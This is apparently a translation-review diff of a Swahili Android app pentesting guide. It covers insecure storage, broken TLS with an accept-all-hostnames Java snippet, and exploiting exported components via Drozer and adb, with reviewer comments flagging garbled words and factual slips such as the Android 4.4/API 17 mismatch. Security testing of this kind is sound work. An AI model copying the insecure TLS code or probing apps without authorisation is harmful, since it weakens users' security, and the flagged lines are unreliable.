- **Thibitisha** ruhusa zilizowekwa kwenye faili zilizotengenezwa na app. Haswa, **angalia** kama faili yoyote imewekwa kuwa readable au writable kwa wote. Hii inaweza kuwa hatari kubwa ya usalama, kwani itaruhusu **programu yoyote** iliyosakinishwa kwenye kifaa, bila kujali asili au nia yake, kusoma au kurekebisha faili hizi.
 | 
			
		||||
 | 
			
		||||
**External Storage**
 | 
			
		||||
 | 
			
		||||
Unaposhughulika na faili kwenye external storage, kama SD Cards, tahadhari zifuatazo zinapaswa kuchukuliwa:
 | 
			
		||||
Unapotumia faili kwenye **external storage**, kama SD Cards, tahadhari zifuatazo zinapaswa kuchukuliwa:
 | 
			
		||||
 | 
			
		||||
1. **Upatikanaji**:
 | 
			
		||||
- Faili kwenye external storage ni **zinazosomwa na kuandikwa kwa ulimwengu mzima**. Hii inamaanisha application yoyote au mtumiaji anaweza kufikia faili hizi.
 | 
			
		||||
2. **Masuala ya Usalama**:
 | 
			
		||||
- Kwa kuzingatia urahisi wa upatikanaji, inashauriwa **kutoihifadhi habari nyeti** kwenye external storage.
 | 
			
		||||
- External storage inaweza kuondolewa au kufikiwa na application yoyote, ikifanya isiwe salama.
 | 
			
		||||
3. **Kushughulikia Data kutoka External Storage**:
 | 
			
		||||
- Daima **fanya validation ya input** kwa data inayopelekwa kutoka external storage. Hii ni muhimu kwa sababu data hiyo inatokana na chanzo kisichoaminika.
 | 
			
		||||
- Kuhifadhi executable au class files kwenye external storage kwa ajili ya dynamic loading inaachwa kwa hatari kubwa.
 | 
			
		||||
- Ikiwa application yako lazima ipate faili za executable kutoka external storage, hakikisha faili hizi zimesainiwa na kuthibitishwa kihasabu kabla ya kuzichukua kwa dynamic. Hatua hii ni muhimu kwa kudumisha uadilifu wa usalama wa application yako.
 | 
			
		||||
1. **Accessibility**:
 | 
			
		||||
- Faili kwenye external storage ni **globally readable and writable**. Hii inamaanisha programu yoyote au mtumiaji anaweza kufikia faili hizi.
2. **Security Concerns**:
- Kutokana na urahisi wa ufikiaji, inadokezwa **kuto hifadhi taarifa nyeti** kwenye external storage.
- External storage inaweza kuondolewa au kufikiwa na programu yoyote, ikifanya isiwe salama.
3. **Handling Data from External Storage**:
- Daima **fanya input validation** kwenye data inayorekebishwa kutoka external storage. Hii ni muhimu kwa sababu data ni kutoka chanzo kisichoaminika.
- Kuingiza executables au class files kwenye external storage kwa ajili ya dynamic loading inachukuliwa kuwa hatari na haipendekezwi.
- Ikiwa application yako lazima ipate faili za executable kutoka external storage, hakikisha faili hizi zimesainiwa na kuthibitishwa kwa cryptographic kabla ya kupakiwa kwa dynamic. Hatua hii ni muhimu kwa kudumisha uadilifu wa usalama wa application yako.
External storage inaweza kufikika katika `/storage/emulated/0` , `/sdcard` , `/mnt/sdcard`
External storage inaweza kufikiwa katika `/storage/emulated/0` , `/sdcard` , `/mnt/sdcard`
> [!TIP]
> Kuanzia Android 4.4 (**API 17**), SD card ina muundo wa directories ambao unapunguza upatikanaji kutoka kwa app hadi directory iliyobuniwa kwa ajili ya app hiyo pekee. Hii inazuia malicious application kupata upatikanaji wa kusoma au kuandika faili za app nyingine.
> Kuanzia na Android 4.4 (**API 17**), SD card ina muundo wa directories ambao **unapunguza ufikiaji kutoka kwa app hadi directory ambayo ni maalum kwa app hiyo**. Hii inazuia application hasidi kupata ufikiaji wa kusoma au kuandika kwa faili za app nyingine.
**Sensitive data stored in clear-text**
- **Shared preferences**: Android inaruhusu kila application kuhifadhi kwa urahisi faili za xml katika njia `/data/data/<packagename>/shared_prefs/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
- **Databases**: Android inaruhusu kila application kuhifadhi kwa urahisi sqlite databases katika njia `/data/data/<packagename>/databases/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
- **Shared preferences**: Android inaruhusu kila application kuhifadhi faili za xml kwa urahisi katika path `/data/data/<packagename>/shared_prefs/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
- **Databases**: Android inaruhusu kila application kuhifadhi sqlite databases kwa urahisi katika path `/data/data/<packagename>/databases/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
### Broken TLS
**Accept All Certificates**
Kwa sababu fulani, wakati mwingine developers wanakubali certificates zote hata kama kwa mfano hostname haifanani, kwa mistari ya code kama ifuatayo:
Kwa sababu fulani wakati mwingine developers wanakubali certificates zote hata kama kwa mfano hostname haifai na mistari ya msimbo kama ifuatayo:
```java
SSLSocketFactory sf = new cc(trustStore);
sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
```
A good way to test this is to try to capture the traffic using some proxy like Burp without authorising Burp CA inside the device. Also, you can generate with Burp a certificate for a different hostname and use it.
Njia nzuri ya kujaribu hii ni kujaribu kunasa trafiki kwa kutumia proxy kama Burp bila kuthibitisha Burp CA ndani ya kifaa. Pia, unaweza kuz生成 certificate na Burp kwa hostname tofauti na kuitumia.
### Kriptografia Imevunjika
### Kriptografia Iliyovunjika
**Mchakato Duni wa Usimamizi wa Vifunguo**
**Mchakato Duni wa Usimamizi wa Funguo**
Baadhi ya watengenezaji huhifadhi data nyeti kwenye storage ya ndani na kuiweka kwa encrypto na key iliyowekwa ndani/kutabirika ndani ya code. Hii haipaswi kufanywa kwa sababu reversing inaweza kumruhusu mshambuliaji kutoa taarifa za siri.
Baadhi ya developers huhifadhi data nyeti kwenye storage ya ndani na kuikryptisha na ufunguo uliowekwa ndani/unaoweza kutabirika kwenye code. Hii haipaswi kufanywa kwa sababu reversing inaweza kuruhusu attackers kutoa taarifa za siri.
**Matumizi ya Algorithms Yasiyo Salama na/au Yaliyopitwa na Wakati**
**Matumizi ya Algorithimu zisizo salama na/au Zilizotumika kwa Muda Mrefu**
Watengenezaji hawapaswi kutumia **deprecated algorithms** kufanya **checks** za uthibitishaji, **store** au **kutuma** data. Baadhi ya algorithms hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumiwa kuhifadhi nywila kwa mfano, inapaswa kutumika hashes zenye uwezo wa kupinga brute-force pamoja na salt.
Developers hawapaswi kutumia **deprecated algorithms** kufanya authorization **checks**, **store** au **send** data. Baadhi ya algorithm hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumiwa kuhifadhi nywila kwa mfano, hash ambazo ni **brute-force resistant** zinapaswa kutumika pamoja na salt.
### Mambo mengine ya kukagua
- Inashauriwa **kupotosha APK** ili kuleta ugumu kwa reverse engineer.
- Ikiwa app ni nyeti (kama apps za benki), inapaswa kufanya **mithili zake ya kukagua kama simu ime-root** na kuchukua hatua zinazofaa.
- Ikiwa app ni nyeti (kama apps za benki), inapaswa kukagua kama **emulator** inatumika.
- Ikiwa app ni nyeti (kama apps za benki), inapaswa **kukagua uadilifu wake kabla ya kuitekeleza** ili kuona ikiwa imebadilishwa.
- Tumia [**APKiD**](https://github.com/rednaga/APKiD) ili kukagua compiler/packer/obfuscator iliyotumika kujenga APK
- Inapendekezwa **ku-obfuscate the APK** ili kufanya kazi ya reverse engineer kuwa ngumu kwa attackers.
- Ikiwa app ni nyeti (kama bank apps), inapaswa kufanya **checks zake kuona kama simu ime-rooted** na kuchukua hatua ipasavyo.
- Ikiwa app ni nyeti (kama bank apps), inapaswa kuangalia kama **emulator** inatumiwa.
- Ikiwa app ni nyeti (kama bank apps), inapaswa **kuangalia integriti yake kabla ya kuitekeleza** ili kuhakikisha haijabadilishwa.
- Tumia [**APKiD**](https://github.com/rednaga/APKiD) kuona compiler/packer/obfuscator gani ilitumiwa kujenga APK
### React Native Application
Soma ukurasa ufuatao kujifunza jinsi ya kupata kwa urahisi javascript code ya React applications:
Soma ukurasa ufuatao ili kujifunza jinsi ya kupata javascript code za React applications kwa urahisi:
{{#ref}}
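Review bot: the new Burp sentence (`Njia nzuri ya kujaribu hii ...`) contains stray CJK characters in `kuz生成 certificate`; the Swahili should read `kuzalisha certificate` (or `kutengeneza certificate`). Two smaller points in the same hunk: the renamed heading `Matumizi ya Algorithimu zisizo salama na/au Zilizotumika kwa Muda Mrefu` says "used for a long time", which loses the sense of "deprecated" that the old `Yaliyopitwa na Wakati` carried; and both versions of the SD-card TIP pair `Android 4.4` with `API 17`, which do not match (API 17 is Android 4.2, while Android 4.4 is API 19), so one of the two values should be corrected while the line is being touched.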
@ -188,7 +188,7 @@ react-native-application.md
### Xamarin Applications
Soma ukurasa ufuatao kujifunza jinsi ya kupata kwa urahisi C# code ya xamarin applications:
Soma ukurasa ufuatao ili kujifunza jinsi ya kupata C# code za xamarin applications kwa urahisi:
{{#ref}}
@ -197,17 +197,17 @@ Soma ukurasa ufuatao kujifunza jinsi ya kupata kwa urahisi C# code ya xamarin ap
### Superpacked Applications
Kulingana na hii [**blog post**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) superpacked ni algorithm ya Meta inayoshinikiza yaliyomo ya application ndani ya faili moja. Blogu inazungumzia kuhusu uwezekano wa kuunda app inayo-decompress aina hizi za apps... na njia ya haraka ambayo inahusisha **kufanya execute application na kukusanya files zilizodecompressed kutoka kwenye filesystem.**
Kulingana na [**blog post**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) superpacked ni Meta algorithm inayobana (compress) yaliyomo ya application ndani ya faili moja. Blogu inazungumzia uwezekano wa kuunda app inayoweza ku-decompress aina hizi za apps... na njia ya haraka zaidi ambayo inahusisha **ku-execute application na kukusanya files zilizo-decompressed kutoka filesystem.**
### Automated Static Code Analysis
Tool [**mariana-trench**](https://github.com/facebook/mariana-trench) inaweza kupata **vulnerabilities** kwa **kuscan** **code** ya application. Tool hii ina orodha ya **known sources** (zinazoelezea kwa tool **maeneo** ambapo **input** inadhibitiwa na mtumiaji), **sinks** (zinazoelezea kwa tool **maeneo hatari** ambapo input ya mtumiaji mbaya inaweza kusababisha uharibifu) na **rules**. Rules hizi zinaelezea **mchanganyiko** wa **sources-sinks** unaoashiria vulnerability.
Tool ya [**mariana-trench**](https://github.com/facebook/mariana-trench) inaweza kupatikana kwa kutafuta **vulnerabilities** kwa **scanning** **code** ya application. Tool hii ina mfululizo wa **known sources** (inayoonyesha sehemu kwa tool ambapo **input** iko **controlled by the user**), **sinks** (inayoonyesha sehemu **dangerous** ambapo input ya mtumiaji mbaya inaweza kusababisha uharibifu) na **rules**. Kanuni hizi zinaeleza **mchanganyiko** wa **sources-sinks** unaoashiria udhaifu.
Kwa uelewa huu, **mariana-trench itapitia code na kupata uwezekano wa vulnerabilities ndani yake**.
Kwa maarifa haya, **mariana-trench itapitia code na kupata udhaifu unaowezekana ndani yake**.
### Secrets leaked
Application inaweza kuwa na secrets (API keys, passwords, hidden urls, subdomains...) ndani yake ambazo unaweza kugundua. Unaweza kutumia tool kama [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks)
Application inaweza kuwa na siri (API keys, passwords, hidden urls, subdomains...) ndani yake ambazo unaweza kugundua. Unaweza kutumia zana kama [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks)
### Bypass Biometric Authentication
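Review bot: the rewritten mariana-trench sentence changes the meaning: `inaweza kupatikana kwa kutafuta vulnerabilities kwa scanning code` says the tool "can be obtained by searching for vulnerabilities", whereas the old line (`inaweza kupata vulnerabilities kwa kuscan code`) correctly says the tool finds vulnerabilities by scanning the code. Suggest `inaweza kupata **vulnerabilities** kwa ku-**scan** **code** ya application`.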
@ -216,14 +216,14 @@ Application inaweza kuwa na secrets (API keys, passwords, hidden urls, subdomain
bypass-biometric-authentication-android.md
{{#endref}}
### Other interesting functions
### Mengineyo ya kazi za kuvutia
- **Code execution**: `Runtime.exec(), ProcessBuilder(), native code:system()`
- **Send SMSs**: `sendTextMessage, sendMultipartTestMessage`
- **Native functions** declared as `native`: `public native, System.loadLibrary, System.load`
- **Utekelezaji wa Msimbo**: `Runtime.exec(), ProcessBuilder(), native code:system()`
- **Kutuma SMSs**: `sendTextMessage, sendMultipartTestMessage`
- **Funsi za native** zilizo elezwa kama `native`: `public native, System.loadLibrary, System.load`
- [Read this to learn **how to reverse native functions**](reversing-native-libraries.md)
### **Other tricks**
### **Mab trick mengine**
{{#ref}}
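Review bot: the new heading `### **Mab trick mengine**` is not valid Swahili; `Mab` looks like a typo, so suggest `### **Mbinu nyingine**` (or keep the English `Other tricks`, as other headings in this file do). Also, both the old and the new SMS bullet spell the SmsManager method as `sendMultipartTestMessage`; the real name is `sendMultipartTextMessage`, worth fixing while the line is being touched.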
@ -234,15 +234,15 @@ content-protocol.md
---
## Dynamic Analysis
## Uchambuzi wa Muda
> Kwanza kabisa, unahitaji mazingira ambapo unaweza kusanidi application na mazingira yote (Burp CA cert, Drozer na Frida hasa). Kwa hivyo, kifaa kilichoroot-ikiwa (emulated au sio) kinapendekezwa sana.
> Kwanza kabisa, unahitaji mazingira ambapo unaweza kusakinisha application na mazingira yote (Burp CA cert, Drozer na Frida hasa). Kwa hivyo, kifaa chenye root (emulated au siyo) kinashauriwa sana.
### Online Dynamic analysis
Unaweza kuunda **akaunti ya bure** katika: [https://appetize.io/](https://appetize.io). Jukwaa hili linakuwezesha **kupakia** na **kufanya execute** APKs, hivyo ni muhimu kuona jinsi apk inavyotenda.
Unaweza kuunda **free account** katika: [https://appetize.io/](https://appetize.io). Jukwaa hili linakuwezesha **upload** na **execute** APKs, hivyo ni muhimu kuona jinsi apk inavyo behave.
Unaweza hata **kuona logs za application yako** kwenye wavuti na kuunganishwa kupitia **adb**.
Hata unaweza **kuona logs za application yako** kwenye wavuti na kuungana kupitia **adb**.
.png>)
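Review bot: `## Uchambuzi wa Muda` translates to "analysis of time", not "Dynamic Analysis", and is inconsistent with the rest of this file, which keeps the term untranslated (`### Online Dynamic analysis` right below it, `uchambuzi huu wa awali wa dynamic` later on); suggest `## Dynamic Analysis` or `## Uchambuzi wa Dynamic`.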
@ -252,112 +252,112 @@ Shukrani kwa muunganisho wa ADB unaweza kutumia **Drozer** na **Frida** ndani ya
#### Using an emulator
- [**Android Studio**](https://developer.android.com/studio) (Unaweza kuunda vifaa **x86** na **arm**, na kulingana na [**hii** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**matoleo ya hivi karibuni ya x86** yanaunga mkono **ARM libraries** bila hitaji la emulator ya arm iliyokuwa polepole).
- Jifunze kuiseti kupitia ukurasa huu:
- [**Android Studio**](https://developer.android.com/studio) (Unaweza kuunda **x86** na **arm** devices, na kulingana na [**hii** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** bila kuhitaji slow arm emulator).
- Jifunze jinsi ya kuiweka hapa:
{{#ref}}
avd-android-virtual-device.md
{{#endref}}
- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(toleo la bure:** Personal Edition, unahitaji kuunda akaunti. _Inapendekezwa **kushusha** toleo **LENYE**_ _**VirtualBox** ili kuepuka makosa ya uwezekano._)
- [**Nox**](https://es.bignox.com) (Bure, lakini haiku-support Frida au Drozer).
- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(Free version:** Personal Edition, unahitaji kuunda account. _It's recommend to **download** the version **WITH**_ _**VirtualBox** ili kuepuka makosa ya uwezekano._)
- [**Nox**](https://es.bignox.com) (Free, lakini haitsupport Frida au Drozer).
> [!TIP]
> Unapounda emulator mpya kwenye jukwaa lolote kumbuka kuwa skrini kubwa inafanya emulator kuwa polepole zaidi. Hivyo chagua skrini ndogo inapowezekana.
> Unapotengeneza emulator mpya kwenye jukwaa lolote kumbuka kuwa skrini kubwa inafanya emulator kukimbia polepole. Hivyo chagua skrini ndogo iwezekanavyo.
Ili **kusakinisha google services** (kama AppStore) kwenye Genymotion unahitaji kubofya kitufe kilicho alama nyekundu kwenye picha ifuatayo:
Ili **kusakinisha google services** (kama AppStore) kwenye Genymotion unahitaji kubofya kitufe kilichowekwa kwa rangi nyekundu kwenye picha ifuatayo:
.png>)
Pia, kumbuka kwamba kwenye **mipangilio ya Android VM katika Genymotion** unaweza kuchagua **Bridge Network mode** (hii itakuwa muhimu ikiwa utakuwa unajiunganisha na Android VM kutoka VM tofauti yenye tools).
Pia, fahamu kuwa katika **configuration ya Android VM katika Genymotion** unaweza kuchagua **Bridge Network mode** (hii itakuwa muhimu ikiwa utaungana kwenye Android VM kutoka VM tofauti yenye tools).
#### Use a physical device
Unahitaji kuamilisha chaguo za **debugging** na itakuwa vizuri kama unaweza kui-**root**:
Unahitaji kuwezesha chaguzi za **debugging** na itakuwa vizuri ikiwa unaweza kuendelea kui-**root**:
1. **Settings**.
2. (FromAndroid 8.0) Chagua **System**.
3. Chagua **About phone**.
4. Bonyeza **Build number** mara 7.
5. Rudi nyuma na utapata **Developer options**.
2. (FromAndroid 8.0) Select **System**.
3. Select **About phone**.
4. Press **Build number** 7 times.
5. Go back and you will find the **Developer options**.
> Mara baada ya kusakinisha application, jambo la kwanza unalopaswa kufanya ni kuijaribu na kuchunguza inafanya nini, jinsi inavyofanya kazi na kujisikia mwenyewe nayo.\
> Ninapendekeza **kutekeleza uchambuzi huu wa awali wa dynamic kwa kutumia MobSF dynamic analysis + pidcat**, ili tuweze **kujifunza jinsi application inavyofanya kazi** wakati MobSF inavyokamata data nyingi **zinazovutia** utakazoweza kuzipitia baadaye.
> Mara baada ya kusakinisha application, jambo la kwanza unalopaswa kufanya ni kuijaribu na kuchunguza inafanya nini, inafanya kazi vipi na kuzoea kuifanya.\
> Napendekeza **kufanya uchambuzi huu wa awali wa dynamic kwa kutumia MobSF dynamic analysis + pidcat**, hivyo tutaweza **kujifunza jinsi application inavyofanya kazi** wakati MobSF inakayaza data nyingi **zazovutia** ambazo unaweza kuzitathmini baadaye.
### Unintended Data Leakage
**Logging**
Watengenezaji wanapaswa kuwa waangalifu kuhusu kufichua **maelezo ya debugging** hadharani, kwani inaweza kusababisha sensitive data leak. Tools [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kwa kufuatilia application logs ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendelewa kwa urahisi wake wa matumizi na uwazi wa kusoma.
Developers wanapaswa kuwa waangalifu kutoonyesha **debugging information** hadharani, kwa maana inaweza kusababisha sensitive data leaks. Tools [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kwa kufuatilia application logs ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendelewa kwa urahisi wa matumizi na readability.
> [!WARNING]
> Kumbuka kwamba tangu **toleo lililozidi Android 4.0**, **applications zinaweza kufikia tu logs zao wenyewe**. Hivyo applications hawawezi kufikia logs za apps nyingine.\
> Hata hivyo, bado inashauriwa **kuto-log maelezo nyeti**.
> Kumbuka kuwa kutoka **later newer than Android 4.0**, **applications are only able to access their own logs**. Hivyo applications haziwezi kupata logs za apps nyingine.\
> Hata hivyo, bado inashauriwa **kutoi-log taarifa nyeti**.
**Copy/Paste Buffer Caching**
Mfumo wa **clipboard-based** wa Android unawezesha kazi ya copy-paste katika apps, lakini una hatari kwa sababu **applications nyingine** zinaweza **kupata** clipboard, ambayo inaweza kufichua data nyeti. Ni muhimu **kuzima kazi za copy/paste** kwa sehemu nyeti za application, kama taarifa za kadi za mkopo, ili kuzuia data leak.
Mfumo wa Android unaotegemea **clipboard** unaruhusu ufanyaji wa copy-paste katika apps, lakini una hatari ya kuwa **applications nyingine** zinaweza **access** clipboard, kwa hivyo zinaweza kufunua data nyeti. Ni muhimu **kuzima kazi za copy/paste** kwa sehemu nyeti za application, kama maelezo ya kadi ya mkopo, ili kuzuia data leaks.
**Crash Logs**
Ikiwa application **inaanguka** na **kuhifadhi logs**, logs hizi zinaweza kumsaidia mshambuliaji, hasa wakati application haiwezi ku-reverse-engineer. Ili kupunguza hatari hii, epuka ku-log kwenye crashes, na kama logs lazima zitumwe kupitia mtandao, hakikisha zinatumwa kupitia channel ya SSL kwa usalama.
Ikiwa application inavunjika (crashes) na **inahifadhi logs**, logs hizi zinaweza kumsaidia attacker, hasa wakati application haiwezi kureverse-engineered. Ili kupunguza hatari hii, epuka kuandika logs wakati wa crash, na ikiwa logs lazima zitumwa kwenye network, hakikisha zinatumwa kwa njia ya SSL kwa usalama.
Kama pentester, **jaribu kuangalia logs hizi**.
**Analytics Data Sent To 3rd Parties**
Applications mara nyingi hujumuisha huduma kama Google Adsense, ambazo zinaweza kwa bahati mbaya kusababisha data nyeti leak kutokana na utekelezaji mbaya wa watengenezaji. Ili kubaini leak za data, inashauriwa **kuchukua traffic ya application** na kuangalia kama kuna taarifa nyeti zinazotumwa kwa huduma za third-party.
Applications mara nyingi hujumuisha huduma kama Google Adsense, ambazo zinaweza kwa bahati mbaya **leak sensitive data** kutokana na utekelezaji usio sahihi na developers. Ili kubaini potential data leaks, inashauriwa **ku-intercept traffic ya application** na kuangalia kama taarifa nyeti zinatumwa kwa huduma za watu wa tatu.
### SQLite DBs
Wengi wa applications watatumia **internal SQLite databases** kuhifadhi taarifa. Wakati wa pentest angalia **databases** zilizoundwa, majina ya **tables** na **columns** na data zote zilizo hifadhiwa kwa sababu unaweza kupata **taarifa nyeti** (ambayo itakuwa vulnerability).\
Databases zinapaswa kuwa ziko katika `/data/data/the.package.name/databases` kama `/data/data/com.mwr.example.sieve/databases`
Wengi wa applications zitatafuta kutumia **internal SQLite databases** kuhifadhi taarifa. Wakati wa pentest angalia **databases** zilizoundwa, majina ya **tables** na **columns** na data zote zilizohifadhiwa kwa sababu unaweza kupata habari nyeti (ambayo inaweza kuwa vulnerability).\
Databases zinapaswa kuwa ziko kwenye `/data/data/the.package.name/databases` kama `/data/data/com.mwr.example.sieve/databases`
Ikiwa database inahifadhi taarifa za siri na ime-**encrypted** lakini unaweza **kupata** **password** ndani ya application, bado ni **vulnerability**.
Ikiwa database inahifadhi taarifa za siri na ime **encrypted** lakini unaweza **find** **password** ndani ya application bado ni **vulnerability**.
Orodhesha tables kwa kutumia `.tables` na orodhesha columns za tables kwa kufanya `.schema <table_name>`
Taja meza (tables) kwa kutumia `.tables` na orodhesha columns za meza kwa kutumia `.schema <table_name>`
### Drozer (Exploit Activities, Content Providers and Services)
From [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** inakuwezesha **kuchukua nafasi ya Android app** na kuingiliana na apps nyingine. Inaweza kufanya **kila kitu ambacho application iliyosakinishwa inaweza kufanya**, kama kutumia mekanisma ya Inter-Process Communication (IPC) ya Android na kuingiliana na operating system ya msingi. .\
Drozer ni tool muhimu ya **kufanya exploit kwa exported activities, exported services na Content Providers** kama utakavyojifunza katika sehemu zifuatazo.
From [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** allows you to **assume the role of an Android app** and interact with other apps. It can do **anything that an installed application can do**, such as make use of Android’s Inter-Process Communication (IPC) mechanism and interact with the underlying operating system. .\
Drozer ni tool muhimu ya **exploit exported activities, exported services and Content Providers** kama utakavyojifunza katika sehemu zifuatazo.
### Exploiting exported Activities
[**Read this if you want to refresh what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\
Kumbuka pia kwamba code ya activity huanza katika method ya **`onCreate`**.
Kumbuka pia kwamba code ya activity inaanzia katika method ya **`onCreate`**.
**Authorisation bypass**
Wakati Activity ime-exported unaweza kuitangaza screen yake kutoka kwa app ya nje. Hivyo, ikiwa activity yenye **taarifa nyeti** ime-**exported** unaweza **kupitia** **mechanisms za authentication** ili kuifikia.
Wakati Activity ime-exported unaweza kuitia kwenye screen kutoka kwa app ya nje. Kwa hivyo, ikiwa activity yenye **taarifa nyeti** ime **exported** unaweza **bypass** mekanisme za **authentication** ili kuipata.
[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/index.html#activities)
Unaweza pia kuanza exported activity kutoka adb:
Unaweza pia kuanzisha exported activity kutoka adb:
- PackageName is com.example.demo
- Exported ActivityName is com.example.test.MainActivity
```bash
adb shell am start -n com.example.demo/com.example.test.MainActivity
```
**NOTE**: MobSF itagundua kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika activity, lakini kutokana na [this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hii ni hatari tu kwenye toleo za zamani (API versions < 21).
**TAARIFA**: MobSF itaona kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika activity, lakini kutokana na [this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hii ni hatari tu kwenye toleo za zamani (API versions < 21).
> [!TIP]
> Kumbuka kwamba an authorisation bypass si kila mara ni udhaifu; itategemea jinsi bypass inavyofanya kazi na taarifa gani zinaonyeshwa.
> Kumbuka kwamba authorisation bypass si kila mara ni vulnerability; yote yatategemea jinsi bypass inavyofanya kazi na ni taarifa gani zinazoonyeshwa.
**Sensitive information leakage**
**Activities pia zinaweza kurudisha matokeo**. Ikiwa utaweza kupata exported na unprotected activity inayoitisha method ya **`setResult`** na **kurudisha taarifa nyeti**, kuna sensitive information leakage.
**Activities can also return results**. Ikiwa unaweza kupata activity iliyotumwa (exported) na isiyolindwa ikiyaita method ya **`setResult`** na **kurudisha sensitive information**, kuna sensitive information leakage.
#### Tapjacking
Ikiwa Tapjacking haizuiziwi, unaweza kutumia exported activity vibaya ili kufanya **mtumiaji afanye vitendo visivyotarajiwa**. Kwa habari zaidi kuhusu [**what is Tapjacking follow the link**](#tapjacking).
Kama tapjacking haizingwi, unaweza kutumia activity iliyotumwa (exported) kumuambia mtumiaji afanye vitendo visivyotarajiwa. Kwa maelezo zaidi kuhusu [**what is Tapjacking follow the link**](#tapjacking).
### Exploiting Content Providers - Accessing and manipulating sensitive information
[**Read this if you want to refresh what is a Content Provider.**](android-applications-basics.md#content-provider)\
Content providers kwa msingi hutumiwa kwa ajili ya **share data**. Ikiwa app ina content providers zinazopatikana unaweza kuwa na uwezo wa **extract sensitive** data kutoka kwao. Pia ni muhimu kujaribu uwezekano wa **SQL injections** na **Path Traversals** kwani zinaweza kuwa vulnerable.
Content providers kwa msingi hutumika **kushiriki data**. Ikiwa app ina content providers zinazopatikana, huenda ukaweza **kutoa sensitive** data kutoka kwazo. Ni muhimu pia kujaribu uwezekano wa **SQL injections** na **Path Traversals** kwani zinaweza kuwa vunerable.
[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/index.html#content-providers)
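Review bot: this hunk regresses already-translated text back to English: steps 2 to 5 of the developer-options list (`2. (FromAndroid 8.0) Select **System**.` through `5. Go back and you will find the **Developer options**.`) replace Swahili lines, and the Drozer paragraph (`From [Drozer Docs](...): **Drozer** allows you to ...`) does the same; either restore the old Swahili or state that these are intentionally left in English. Both versions also lack the space in `FromAndroid 8.0`. Several new lines carry typos or garbled words that the old lines did not: `haitsupport` in the Nox bullet, `inakayaza` and `zazovutia` in the MobSF TIP (old line had `inavyokamata` and `zinazovutia`), `kutoka **later newer than Android 4.0**` in the logging WARNING (mixed English; something like `kuanzia matoleo mapya kuliko Android 4.0` reads correctly), `haizingwi` in the Tapjacking paragraph (old `haizuiziwi`), and `vunerable` in the Content Providers paragraph.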
@ -366,8 +366,7 @@ Content providers kwa msingi hutumiwa kwa ajili ya **share data**. Ikiwa app ina
[**Read this if you want to refresh what is a Service.**](android-applications-basics.md#services)\
Kumbuka kwamba vitendo vya Service huanza katika method `onStartCommand`.
Service kwa kawaida ni kitu ambacho **kinaweza kupokea data**, **kuita process** na **kurudisha** (au la) response. Hivyo, ikiwa application inatokeza baadhi ya services unapaswa **kuangalia** **code** ili kuelewa inafanya nini na **kujaribu** kwa njia **dynamically** ili kutoa taarifa za siri, kupita hatua za uthibitishaji...
Service kwa msingi ni kitu ambacho **kinaweza kupokea data**, **kuchakata** na **kurudisha** (au la) majibu. Hivyo, ikiwa application inatoa services, inapaswa **kagua** **code** ili kuelewa inafanya nini na **jaribu** kivitendo (**dynamically**) kupata taarifa za siri, kuzuia authentication measures...\
[**Learn how to exploit Services with Drozer.**](drozer-tutorial/index.html#services)
### **Exploiting Broadcast Receivers**
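Review bot: the merged Service sentence changes subject and meaning: `ikiwa application inatoa services, inapaswa **kagua** **code**` now tells the application to check the code (and `kagua` lacks the infinitive `ku-`), whereas the old line addressed the tester (`unapaswa **kuangalia** **code**`); likewise `kuzuia authentication measures` means "prevent", not "bypass", which the old `kupita hatua za uthibitishaji` expressed. Suggest `unapaswa **kukagua** **code** ili kuelewa inafanya nini na **kujaribu** kwa njia **dynamically** kupata taarifa za siri, kupita authentication measures...`.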
@ -375,17 +374,17 @@ Service kwa kawaida ni kitu ambacho **kinaweza kupokea data**, **kuita process**
[**Read this if you want to refresh what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\
Kumbuka kwamba vitendo vya Broadcast Receiver huanza katika method `onReceive`.
Broadcast receiver itakuwa ikisubiri aina fulani ya message. Kulingana na jinsi receiver inavyoshughulikia message inaweza kuwa vulnerable.\
Broadcast receiver itakuwa ikisubiri aina fulani ya ujumbe. Kulingana na jinsi receiver inavyoshughulikia ujumbe, inaweza kuwa vunerable.\
[**Learn how to exploit Broadcast Receivers with Drozer.**](#exploiting-broadcast-receivers)
### **Exploiting Schemes / Deep links**
Unaweza kutafuta deep links kwa mkono, kwa kutumia zana kama MobSF au scripts kama [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).\
Unaweza **open** declared **scheme** kwa kutumia **adb** au **browser**:
